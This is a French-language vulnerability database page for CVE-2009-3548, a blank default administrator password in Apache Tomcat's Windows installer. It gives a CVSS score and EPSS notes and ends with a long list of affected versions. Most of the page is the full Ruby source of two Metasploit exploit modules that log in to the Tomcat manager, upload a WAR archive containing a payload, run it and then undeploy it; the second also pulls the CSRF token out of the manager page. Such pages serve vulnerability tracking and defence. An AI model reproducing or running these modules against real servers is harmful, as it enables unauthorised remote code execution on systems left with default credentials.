CVE-2009-3548
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Credentials Management Errors Weaknesses in this category are related to the management of credentials. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 16317
Date de publication : 2010-12-13 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: tomcat_mgr_deploy.rb 11330 2010-12-14 17:26:44Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Manager Application Deployer Authenticated Code Execution',
'Description' => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
containing a jsp application using a PUT request.
The manager application can also be abused using /manager/html/upload, but that
method is not implemented in this module.
},
'Author' => [ 'jduck' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11330 $',
'References' =>
[
# There is no single vulnerability associated with deployment functionality.
# Instead, the focus has been on insecure/blank/hardcoded default passwords.
# The following references refer to HP Operations Manager
[ 'CVE', '2009-3843' ],
[ 'OSVDB', '60317' ],
[ 'CVE', '2009-4189' ],
[ 'OSVDB', '60670' ],
# HP Operations Dashboard
[ 'CVE', '2009-4188' ],
# IBM Cognos Express Default user/pass
[ 'BID', '38084' ],
[ 'CVE', '2010-0557' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179' ],
# IBM Rational Quality Manager and Test Lab Manager
[ 'CVE', '2010-4094' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-214/' ],
# 'admin' password is blank in default Windows installer
[ 'CVE', '2009-3548' ],
[ 'OSVDB', '60176' ],
[ 'BID', '36954' ],
# tomcat docs
[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
#
# detect via /manager/serverinfo
#
[ 'Automatic', { } ],
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 09 2009'))
register_options(
[
OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ]),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
# /cognos_express/manager/ for Cognos Express (19300)
OptString.new('PATH', [ true, "The URI path of the manager app (/deploy and /undeploy will be used)", '/manager'])
], self.class)
end
def auto_target
print_status("Attempting to automatically select a target...")
res = query_serverinfo()
return nil if not res
plat = detect_platform(res.body)
arch = detect_arch(res.body)
# No arch or platform found?
if (not arch or not plat)
return nil
end
# see if we have a match
targets.each { |t|
if (t['Platform'] == plat) and (t['Arch'] == arch)
return t
end
}
# no matching target found
return nil
end
def exploit
datastore['BasicAuthUser'] = datastore['USERNAME']
datastore['BasicAuthPass'] = datastore['PASSWORD']
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
if (not mytarget)
raise RuntimeError, "Unable to automatically select a target"
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
print_status("Using manually select target \"#{mytarget.name}\"")
end
# We must regenerate the payload in case our auto-magic changed something.
p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
# Generate the WAR containing the EXE containing the payload
jsp_name = rand_text_alphanumeric(4+rand(32-4))
app_base = rand_text_alphanumeric(4+rand(32-4))
# Generate the WAR containing the payload
war = p.encoded_war({
:app_name => app_base,
:jsp_name => jsp_name,
:arch => mytarget.arch,
:platform => mytarget.platform
}).to_s
query_str = "?path=/" + app_base
#
# UPLOAD
#
path_tmp = datastore['PATH'] + "/deploy" + query_str
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
res = send_request_cgi({
'uri' => path_tmp,
'method' => 'PUT',
'ctype' => 'application/octet-stream',
'data' => war,
}, 20)
if (! res)
raise RuntimeError, "Upload failed on #{path_tmp} [No Response]"
end
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
raise RuntimeError, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]"
end
#
# EXECUTE
#
jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'
print_status("Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
}, 20)
if (! res)
print_error("Execution failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
print_status(res.body) if datastore['VERBOSE']
end
#
# DELETE
#
path_tmp = datastore['PATH'] + "/undeploy" + query_str
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'uri' => path_tmp,
'method' => 'GET'
}, 20)
if (! res)
print_error("WARNING: Undeployment failed on #{path} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("Deletion failed on #{path} [#{res.code} #{res.message}]")
end
handler
end
def query_serverinfo()
path = datastore['PATH'] + '/serverinfo'
res = send_request_raw(
{
'uri' => path
}, 10)
if (not res) or (res.code != 200)
print_error("Failed: Error requesting #{path}")
return nil
end
print_status(res.body) if datastore['VERBOSE']
return res
end
def detect_platform(body = nil)
if not body
res = query_serverinfo()
return nil if not res
body = res.body
end
body.each_line { |ln|
ln.chomp!
case ln
when /OS Name: /
os = ln.split(':')[1]
case os
when /Windows/
return 'win'
when /Linux/
return 'linux'
end
end
}
end
def detect_arch(body)
body.each_line { |ln|
ln.chomp!
case ln
when /OS Architecture: /
ar = ln.split(':')[1].strip
case ar
when 'x86', 'i386', 'i686'
return ARCH_X86
when 'x86_64', 'amd64'
return ARCH_X86
end
end
}
end
end
Exploit Database EDB-ID : 31433
Date de publication : 2014-02-04 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
CSRF_VAR = 'CSRF_NONCE='
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
'Description' => %q{
This module can be used to execute a payload on Apache Tomcat servers that
have an exposed "manager" application. The payload is uploaded as a WAR archive
containing a jsp application using a POST request against the /manager/html/upload
component.
NOTE: The compatible payload sets vary based on the selected target. For
example, you must select the Windows target to use native Windows payloads.
},
'Author' => 'rangercha',
'License' => MSF_LICENSE,
'References' =>
[
# This is based on jduck's tomcat_mgr_deploy.
# the tomcat_mgr_deploy o longer works for current versions of tomcat due to
# CSRF protection tokens. Also PUT requests against the /manager/html/deploy
# aren't allowed anymore.
# There is no single vulnerability associated with deployment functionality.
# Instead, the focus has been on insecure/blank/hardcoded default passwords.
# The following references refer to HP Operations Manager
['CVE', '2009-3843'],
['OSVDB', '60317'],
['CVE', '2009-4189'],
['OSVDB', '60670'],
# HP Operations Dashboard
['CVE', '2009-4188'],
# IBM Cognos Express Default user/pass
['BID', '38084'],
['CVE', '2010-0557'],
['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179'],
# IBM Rational Quality Manager and Test Lab Manager
['CVE', '2010-4094'],
['ZDI', '10-214'],
# 'admin' password is blank in default Windows installer
['CVE', '2009-3548'],
['OSVDB', '60176'],
['BID', '36954'],
# tomcat docs
['URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html']
],
'Platform' => %w{ java linux win }, # others?
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
}
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux x86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 09 2009'))
register_options(
[
OptString.new('USERNAME', [false, 'The username to authenticate as']),
OptString.new('PASSWORD', [false, 'The password for the specified username']),
# /cognos_express/manager/ for Cognos Express (19300)
OptString.new('TARGETURI', [true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
], self.class)
end
def check
res = query_manager
disconnect
return CheckCode::Unknown if res.nil?
if res.code.between?(400, 499)
vprint_error("#{peer} - Server rejected the credentials")
return CheckCode::Unknown
end
return CheckCode::Safe unless res.code == 200
# if res.code == 200
# there should be access to the Tomcat Manager and to the status page
res = query_status
return CheckCode::Unknown unless res
plat = detect_platform(res.body)
arch = detect_arch(res.body)
return CheckCode::Unknown unless plat and arch
vprint_status("#{peer} - Tomcat Manager found running on #{plat} platform and #{arch} architecture")
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
return CheckCode::Appears
end
def exploit
@app_base = rand_text_alphanumeric(4 + rand(32 - 4))
@jsp_name = rand_text_alphanumeric(4 + rand(32 - 4))
#
# Find the session ID and the CSRF token
#
print_status("#{peer} - Retrieving session ID and CSRF token...")
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Upload Payload
#
print_status("#{peer} - Uploading and deploying #{@app_base}...")
if upload_payload
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['USERNAME'],
:pass => datastore['PASSWORD'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
else
fail_with(Failure::Unknown, "Upload failed")
end
#
# Execute Payload
#
print_status("#{peer} - Executing #{@app_base}...")
unless execute_payload
fail_with(Failure::Unknown, "Failed to execute the payload")
end
#
# Get the new CSRF token & session id
#
unless access_manager?
fail_with(Failure::Unknown, "Unable to access the Tomcat Manager")
end
#
# Delete the deployed payload
#
print_status("#{peer} - Undeploying #{@app_base} ...")
unless undeploy_app
print_warning("#{peer} - Failed to undeploy #{@app_base}...")
end
end
def query_status
path = normalize_uri(target_uri.path.to_s, 'status')
res = send_request_raw('uri' => path)
unless res and res.code == 200
vprint_error("Failed: Error requesting #{path}")
return nil
end
return res
end
def query_manager
path = normalize_uri(target_uri.path.to_s, '/html')
res = send_request_raw('uri' => path)
return res
end
def vars_get
vars = {}
unless @csrf_token.nil?
vars = {
"path" => @app_base,
"org.apache.catalina.filters.CSRF_NONCE" => @csrf_token
}
end
return vars
end
def detect_platform(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Name/
if i == 9 or i == 11
if ln.include? "Windows"
return 'win'
elsif ln.include? "Linux"
return 'linux'
elsif i==11
return 'unknown'
end
end
i = i+1 if i > 0
end
end
def detect_arch(body)
return nil if body.blank?
i=0
body.each_line do |ln|
ln.chomp!
i = 1 if ln =~ /OS Architecture/
if i==9 or i==11
if ln.include? 'x86'
return ARCH_X86
elsif ln.include? 'i386'
return ARCH_X86
elsif ln.include? 'i686'
return ARCH_X86
elsif ln.include? 'x86_64'
return ARCH_X86
elsif ln.include? 'amd64'
return ARCH_X86
elsif i==11
return 'unknown'
end
end
i = i + 1 if i > 0
end
end
def find_csrf(res = nil)
return "" if res.blank?
vprint_status("#{peer} - Finding CSRF token...")
body = res.body
body.each_line do |ln|
ln.chomp!
csrf_nonce = ln.index(CSRF_VAR)
next if csrf_nonce.nil?
token = ln[csrf_nonce + CSRF_VAR.length, 32]
return token
end
return ""
end
def generate_multipart_msg(boundary, data)
# Rex::MIME::Message is breaking the binary upload when trying to
# enforce CRLF for SMTP compatibility
war_multipart = "-----------------------------"
war_multipart << boundary
war_multipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
war_multipart << @app_base
war_multipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
war_multipart << data
war_multipart << "\r\n-----------------------------"
war_multipart << boundary
war_multipart << "--\r\n"
end
def war_payload
payload.encoded_war({
:app_name => @app_base,
:jsp_name => @jsp_name,
:arch => target.arch,
:platform => target.platform
}).to_s
end
def send_war_payload(url, war)
boundary_identifier = rand_text_numeric(28)
res = send_request_cgi({
'uri' => url,
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id,
'vars_get' => vars_get,
'data' => generate_multipart_msg(boundary_identifier, war),
})
return res
end
def send_request_undeploy(url)
res = send_request_cgi({
'uri' => url,
'vars_get' => vars_get,
'method' => 'POST',
'user' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'cookie' => @session_id
})
return res
end
def access_manager?
res = query_manager
return false unless res and res.code == 200
@session_id = res.get_cookies
@csrf_token = find_csrf(res)
return true
end
def upload_payload
war = war_payload
upload_path = normalize_uri(target_uri.path.to_s, "html", "upload")
vprint_status("#{peer} - Uploading #{war.length} bytes as #{@app_base}.war ...")
res = send_war_payload(upload_path, war)
return parse_upload_response(res)
end
def parse_upload_response(res)
unless res
vprint_error("#{peer} - Upload failed on #{upload_path} [No Response]")
return false
end
if res.code < 200 or res.code >= 300
vprint_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}") if res.code == 401
vprint_error("Upload failed on #{upload_path} [#{res.code} #{res.message}]")
return false
end
return true
end
def execute_payload
jsp_path = normalize_uri(@app_base, "#{@jsp_name}.jsp")
vprint_status("#{peer} - Executing #{jsp_path}...")
res = send_request_cgi({
'uri' => jsp_path,
'method' => 'GET'
})
return parse_execute_response(res)
end
def parse_execute_response(res)
unless res
vprint_error("#{peer} - Execution failed on #{@app_base} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_error("#{peer} - Execution failed on #{@app_base} [#{res.code} #{res.message}]")
return false
end
return true
end
def undeploy_app
undeploy_url = normalize_uri(target_uri.path.to_s, "html", "undeploy")
res = send_request_undeploy(undeploy_url)
unless res
vprint_warning("#{peer} - WARNING: Undeployment failed on #{undeploy_url} [No Response]")
return false
end
if res and (res.code < 200 or res.code >= 300)
vprint_warning("#{peer} - Deletion failed on #{undeploy_url} [#{res.code} #{res.message}]")
return false
end
return true
end
end
Products Mentioned
Configuraton 0
Apache>>Tomcat >> Version 3.0
- Apache>>Tomcat >> Version 3.0 (Open CPE detail)
Apache>>Tomcat >> Version 3.1
- Apache>>Tomcat >> Version 3.1 (Open CPE detail)
Apache>>Tomcat >> Version 3.1.1
- Apache>>Tomcat >> Version 3.1.1 (Open CPE detail)
Apache>>Tomcat >> Version 3.2
- Apache>>Tomcat >> Version 3.2 (Open CPE detail)
Apache>>Tomcat >> Version 3.2.1
- Apache>>Tomcat >> Version 3.2.1 (Open CPE detail)
Apache>>Tomcat >> Version 3.2.2
- Apache>>Tomcat >> Version 3.2.2 (Open CPE detail)
- Apache>>Tomcat >> Version 3.2.2 (Open CPE detail)
Apache>>Tomcat >> Version 3.2.2
- Apache>>Tomcat >> Version 3.2.2 (Open CPE detail)
Apache>>Tomcat >> Version 3.2.3
- Apache>>Tomcat >> Version 3.2.3 (Open CPE detail)
Apache>>Tomcat >> Version 3.2.4
- Apache>>Tomcat >> Version 3.2.4 (Open CPE detail)
Apache>>Tomcat >> Version 3.3
- Apache>>Tomcat >> Version 3.3 (Open CPE detail)
Apache>>Tomcat >> Version 3.3.1
- Apache>>Tomcat >> Version 3.3.1 (Open CPE detail)
Apache>>Tomcat >> Version 3.3.1a
- Apache>>Tomcat >> Version 3.3.1a (Open CPE detail)
Apache>>Tomcat >> Version 3.3.2
- Apache>>Tomcat >> Version 3.3.2 (Open CPE detail)
Apache>>Tomcat >> Version 4.0.0
- Apache>>Tomcat >> Version 4.0.0 (Open CPE detail)
Apache>>Tomcat >> Version 4.0.1
- Apache>>Tomcat >> Version 4.0.1 (Open CPE detail)
Apache>>Tomcat >> Version 4.0.2
- Apache>>Tomcat >> Version 4.0.2 (Open CPE detail)
Apache>>Tomcat >> Version 4.0.3
- Apache>>Tomcat >> Version 4.0.3 (Open CPE detail)
Apache>>Tomcat >> Version 4.0.4
- Apache>>Tomcat >> Version 4.0.4 (Open CPE detail)
Apache>>Tomcat >> Version 4.0.5
- Apache>>Tomcat >> Version 4.0.5 (Open CPE detail)
Apache>>Tomcat >> Version 4.0.6
- Apache>>Tomcat >> Version 4.0.6 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.0
- Apache>>Tomcat >> Version 4.1.0 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.1
- Apache>>Tomcat >> Version 4.1.1 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.2
- Apache>>Tomcat >> Version 4.1.2 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.3
- Apache>>Tomcat >> Version 4.1.3 (Open CPE detail)
- Apache>>Tomcat >> Version 4.1.3 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.3
- Apache>>Tomcat >> Version 4.1.3 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.4
- Apache>>Tomcat >> Version 4.1.4 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.5
- Apache>>Tomcat >> Version 4.1.5 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.6
- Apache>>Tomcat >> Version 4.1.6 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.7
Apache>>Tomcat >> Version 4.1.8
- Apache>>Tomcat >> Version 4.1.8 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.9
- Apache>>Tomcat >> Version 4.1.9 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.9
- Apache>>Tomcat >> Version 4.1.9 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.10
- Apache>>Tomcat >> Version 4.1.10 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.11
- Apache>>Tomcat >> Version 4.1.11 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.12
- Apache>>Tomcat >> Version 4.1.12 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.13
- Apache>>Tomcat >> Version 4.1.13 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.14
- Apache>>Tomcat >> Version 4.1.14 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.15
- Apache>>Tomcat >> Version 4.1.15 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.16
- Apache>>Tomcat >> Version 4.1.16 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.17
- Apache>>Tomcat >> Version 4.1.17 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.18
- Apache>>Tomcat >> Version 4.1.18 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.19
- Apache>>Tomcat >> Version 4.1.19 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.20
- Apache>>Tomcat >> Version 4.1.20 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.21
- Apache>>Tomcat >> Version 4.1.21 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.22
- Apache>>Tomcat >> Version 4.1.22 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.23
- Apache>>Tomcat >> Version 4.1.23 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.24
- Apache>>Tomcat >> Version 4.1.24 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.25
- Apache>>Tomcat >> Version 4.1.25 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.26
- Apache>>Tomcat >> Version 4.1.26 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.27
- Apache>>Tomcat >> Version 4.1.27 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.28
- Apache>>Tomcat >> Version 4.1.28 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.29
- Apache>>Tomcat >> Version 4.1.29 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.30
- Apache>>Tomcat >> Version 4.1.30 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.31
- Apache>>Tomcat >> Version 4.1.31 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.32
- Apache>>Tomcat >> Version 4.1.32 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.33
- Apache>>Tomcat >> Version 4.1.33 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.34
Apache>>Tomcat >> Version 4.1.35
- Apache>>Tomcat >> Version 4.1.35 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.36
- Apache>>Tomcat >> Version 4.1.36 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.37
- Apache>>Tomcat >> Version 4.1.37 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.38
- Apache>>Tomcat >> Version 4.1.38 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.39
- Apache>>Tomcat >> Version 4.1.39 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.0
- Apache>>Tomcat >> Version 5.0.0 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.1
- Apache>>Tomcat >> Version 5.0.1 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.2
- Apache>>Tomcat >> Version 5.0.2 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.3
- Apache>>Tomcat >> Version 5.0.3 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.4
- Apache>>Tomcat >> Version 5.0.4 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.5
- Apache>>Tomcat >> Version 5.0.5 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.6
- Apache>>Tomcat >> Version 5.0.6 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.7
- Apache>>Tomcat >> Version 5.0.7 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.8
- Apache>>Tomcat >> Version 5.0.8 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.9
- Apache>>Tomcat >> Version 5.0.9 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.10
- Apache>>Tomcat >> Version 5.0.10 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.11
- Apache>>Tomcat >> Version 5.0.11 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.12
- Apache>>Tomcat >> Version 5.0.12 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.13
- Apache>>Tomcat >> Version 5.0.13 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.14
- Apache>>Tomcat >> Version 5.0.14 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.15
- Apache>>Tomcat >> Version 5.0.15 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.16
- Apache>>Tomcat >> Version 5.0.16 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.17
- Apache>>Tomcat >> Version 5.0.17 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.18
- Apache>>Tomcat >> Version 5.0.18 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.19
- Apache>>Tomcat >> Version 5.0.19 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.21
- Apache>>Tomcat >> Version 5.0.21 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.22
- Apache>>Tomcat >> Version 5.0.22 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.23
- Apache>>Tomcat >> Version 5.0.23 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.24
- Apache>>Tomcat >> Version 5.0.24 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.25
- Apache>>Tomcat >> Version 5.0.25 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.26
- Apache>>Tomcat >> Version 5.0.26 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.27
- Apache>>Tomcat >> Version 5.0.27 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.28
- Apache>>Tomcat >> Version 5.0.28 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.29
- Apache>>Tomcat >> Version 5.0.29 (Open CPE detail)
Apache>>Tomcat >> Version 5.0.30
- Apache>>Tomcat >> Version 5.0.30 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.0
- Apache>>Tomcat >> Version 5.5.0 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.1
- Apache>>Tomcat >> Version 5.5.1 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.2
- Apache>>Tomcat >> Version 5.5.2 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.3
- Apache>>Tomcat >> Version 5.5.3 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.4
- Apache>>Tomcat >> Version 5.5.4 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.5
- Apache>>Tomcat >> Version 5.5.5 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.6
- Apache>>Tomcat >> Version 5.5.6 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.7
- Apache>>Tomcat >> Version 5.5.7 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.8
- Apache>>Tomcat >> Version 5.5.8 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.9
- Apache>>Tomcat >> Version 5.5.9 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.10
- Apache>>Tomcat >> Version 5.5.10 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.11
- Apache>>Tomcat >> Version 5.5.11 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.12
- Apache>>Tomcat >> Version 5.5.12 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.13
- Apache>>Tomcat >> Version 5.5.13 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.14
- Apache>>Tomcat >> Version 5.5.14 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.15
- Apache>>Tomcat >> Version 5.5.15 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.16
- Apache>>Tomcat >> Version 5.5.16 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.17
- Apache>>Tomcat >> Version 5.5.17 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.18
- Apache>>Tomcat >> Version 5.5.18 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.19
- Apache>>Tomcat >> Version 5.5.19 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.20
- Apache>>Tomcat >> Version 5.5.20 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.21
- Apache>>Tomcat >> Version 5.5.21 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.22
- Apache>>Tomcat >> Version 5.5.22 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.23
- Apache>>Tomcat >> Version 5.5.23 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.24
- Apache>>Tomcat >> Version 5.5.24 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.25
- Apache>>Tomcat >> Version 5.5.25 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.26
- Apache>>Tomcat >> Version 5.5.26 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.27
- Apache>>Tomcat >> Version 5.5.27 (Open CPE detail)
Apache>>Tomcat >> Version 5.5.28
- Apache>>Tomcat >> Version 5.5.28 (Open CPE detail)
Apache>>Tomcat >> Version 6.0
- Apache>>Tomcat >> Version 6.0 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.0
- Apache>>Tomcat >> Version 6.0.0 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.0 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.1
- Apache>>Tomcat >> Version 6.0.1 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.1 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.2
- Apache>>Tomcat >> Version 6.0.2 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.2 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.2 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.3
- Apache>>Tomcat >> Version 6.0.3 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.4
- Apache>>Tomcat >> Version 6.0.4 (Open CPE detail)
- Apache>>Tomcat >> Version 6.0.4 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.5
- Apache>>Tomcat >> Version 6.0.5 (Open CPE detail)
Apache>>Tomcat >> Version 6.0.6
